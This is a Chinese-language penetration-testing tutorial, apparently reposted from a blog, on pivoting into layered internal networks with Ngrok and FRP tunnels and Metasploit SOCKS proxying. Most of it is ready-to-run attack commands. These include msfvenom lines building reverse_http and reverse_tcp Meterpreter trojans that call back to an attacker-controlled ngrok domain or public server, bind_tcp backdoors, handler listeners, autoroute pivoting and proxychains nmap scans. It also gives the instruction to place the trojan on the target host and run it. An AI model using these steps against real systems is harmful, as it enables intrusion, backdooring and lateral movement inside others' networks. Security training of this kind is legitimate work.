内网安全:Socks 代理 || 本地代理 技术.

内网安全:Socks 代理 || 本地代理 技术.,第1张

内网安全:Socks 代理 || 本地代理 技术.

Socks 代理又称全能代理,就像有很多跳线的转接板,它只是简单地将一端的系统连接到另外一端。支持多种协议,包括http、ftp请求及其它类型的请求。它分socks 4 和socks 5两种类型,socks 4只支持TCP协议而socks 5支持TCP/UDP协议,还支持各种身份验证机制等协议。其标准端口为1080.


目录:

内网安全:Socks 代理 技术.

两个内网通讯上线( Ngrok )

(1)开通隧道:

(2)下载客户端:

(3)生成一个程序后门:

(4)进行监听:(kali)

两个内网通讯上线( Frp 自建跳板 )

(1)跳板环境搭建:

(2)生成程序后面:

(3)进行监听:(kali)

本地代理:( MSF 跳板多个内网主机系列)

第二层内网代理:

(1)信息收集及配置访问:

(2)开启本地代理:

(3)内网扫描:

(4)浏览器访问:

第三层内网代理:

(1)生成正向程序后门:

(2)进行监听:

(3)信息收集及配置访问:

(4)开启本地代理:

第四层内网渗透:

(1)生成正向程序后门:

 (2)进行监听:


代理解决的问题:(1)内网有外网 (2)内网有过滤 (3)内网无外网


两个内网通讯上线( Ngrok )

开通隧道工具:https://www.ngrok.cc/user.html

理解:二个内网主机不能相互连接的,这样就可以通过开通的隧道进行连接. (开通的隧道就是在外网开通一个域名:当目标访问这个域名,则会将数据返还回来到kali中)

(1)开通隧道:

内网安全:Socks 代理 || 本地代理 技术.,第2张

内网安全:Socks 代理 || 本地代理 技术.,第3张

内网安全:Socks 代理 || 本地代理 技术.,第4张


(2)下载客户端:

内网安全:Socks 代理 || 本地代理 技术.,第5张

内网安全:Socks 代理 || 本地代理 技术.,第6张

解压放到 kali 中:(切换的刚刚下载的文件目录中)(1)./sunny clientid 115735315695 // 执行 ./sunny clientid 隧道的IP

内网安全:Socks 代理 || 本地代理 技术.,第7张

内网安全:Socks 代理 || 本地代理 技术.,第8张


(3)生成一个程序后门:(木马)

msfvenom -p windows/meterpreter/reverse_http lhost=bgxg.free.idcfengye.com lport=80 -f exe -o bgxg.exe

内网安全:Socks 代理 || 本地代理 技术.,第9张


(4)进行监听:(kali)

(1)msfconsole(2)use exploit/multi/handler(3)set payload windows/meterpreter/reverse_http(4)set lhost 192.168.0.106 // 本地的 IP 地址(5)set lport 4444 // 本地的 端口.(6)exploit

内网安全:Socks 代理 || 本地代理 技术.,第10张


两个内网通讯上线( Frp 自建跳板 )

(1)跳板环境搭建:

需要有自己的服务器,有来搭建跳板.

【服务器 和 控制端】需要下载的工具:https://github.com/fatedier/frp/releases

内网安全:Socks 代理 || 本地代理 技术.,第11张

服务器修改配置文件 frps.ini: [common] bind_port = 6677 // 这个端口修改为 服务器 开放的就行启动服务端:【切换在下载的目录并执行】 ./frps -c ./frps.ini

控制端修改配置文件 frpc.ini: [common] server_addr = 云主机 IP 地址 server_port = 6677 // frpc 工作端口,必须和上面 frps 保持一致 [msf] type = tcp local_ip = 127.0.0.1 local_port = 5555 // 转发给本机的 5555 remote_port = 6000 // 服务端用 6000 端口转发给本机启动客户端:【切换在下载的目录并执行】 ./frpc -c ./frpc.ini


(2)生成程序后面:(木马)

msfvenom -p windows/meterpreter/reverse_tcp lhost=服务器(公网)的IP地址 lport=6000 -f exe -o frp.exe


(3)进行监听:(kali)

(1)msfconsole(2)use exploit/multi/handler(3)set payload windows/meterpreter/reverse_tcp(4)set LHOST 127.0.0.1 (5)set LPORT 5555 // 本机监听的端口【和控制端的一样】(6)exploit然后把程序后门(木马)放在目标主机上执行就行.


本地代理:( MSF 跳板多个内网主机系列)

第二层内网代理:

(1)信息收集及配置访问:

(1)run get_local_subnets // 获取网络接口(2)run autoroute -p // 查看路由地址(3)run autoroute -s 10.0.20.0/24 // 添加地二层内网的路由网段.或(3)run post/multi/manage/autoroute // 自动添加,目前所有路由网段

内网安全:Socks 代理 || 本地代理 技术.,第12张


(2)开启本地代理:

background // 挂起会话如果是msf6,使用代理模板为:use auxiliary/server/socks_proxy如果是msf5,使用代理模板为:use auxiliary/server/socks4a

(1)set srvport 2222 // 设置本地代理端口为2222(2)exploit // 运行

内网安全:Socks 代理 || 本地代理 技术.,第13张


(3)内网扫描:

打开 /etc/proxychains4.conf 文件:socks4 192.168.0.106 2222 // 添加 本地的代理和端口

内网安全:Socks 代理 || 本地代理 技术.,第14张

进行扫描:proxychains4 nmap -sT -Pn 10.0.20.0/24 -p 80 -Pn:扫描主机检测其是否受到数据包过滤软件或防火墙的保护.-sT:扫描 TCP 数据包已建立的连接 connect

内网安全:Socks 代理 || 本地代理 技术.,第15张


(4)浏览器访问:

内网安全:Socks 代理 || 本地代理 技术.,第16张

内网安全:Socks 代理 || 本地代理 技术.,第17张


第三层内网代理:

(1)生成正向程序后门:

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=54321 -f exe > 54321.exe

内网安全:Socks 代理 || 本地代理 技术.,第18张


(2)进行监听:

要在和上面一样的 msf 会话中执行.(1)use exploit/multi/handler (2)set payload windows/x64/meterpreter/bind_tcp(3)set rhost 10.0.20.99 // 第二层内网的 IP 地址(4)set lport 54321 // 和程序后面(木马)一样的端口(5)exploit

内网安全:Socks 代理 || 本地代理 技术.,第19张


(3)信息收集及配置访问:

(1)run get_local_subnets // 获取网络接口(2)run autoroute -p // 查看路由地址(3)run post/multi/manage/autoroute // 自动添加,目前所有路由网段.

内网安全:Socks 代理 || 本地代理 技术.,第20张


(4)开启本地代理:

background // 挂起会话如果是msf6,使用代理模板为:use auxiliary/server/socks_proxy如果是msf5,使用代理模板为:use auxiliary/server/socks4a

内网安全:Socks 代理 || 本地代理 技术.,第21张

(1)set srvport 6666 // 默认端口6666(2)exploit // 运行

内网安全:Socks 代理 || 本地代理 技术.,第22张


第四层内网渗透:

(1)生成正向程序后门:

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=9876 -f exe > 9876.exe

内网安全:Socks 代理 || 本地代理 技术.,第23张


 (2)进行监听:

要在和上面一样的 msf 会话中执行.(1)use exploit/multi/handler (2)set payload windows/x64/meterpreter/bind_tcp(3)set rhost 10.0.10.110 // 第二层内网的 IP 地址(4)set lport 9876 // 和程序后面(木马)一样的端口(5)exploit

内网安全:Socks 代理 || 本地代理 技术.,第24张

      

     

   

学习链接:第70天:内网安全-域横向内网漫游Socks代理隧道技术_哔哩哔哩_bilibili

欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/yw/13518151.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2024-01-03
下一篇 2024-01-06

发表评论

登录后才能评论

评论列表(0条)

保存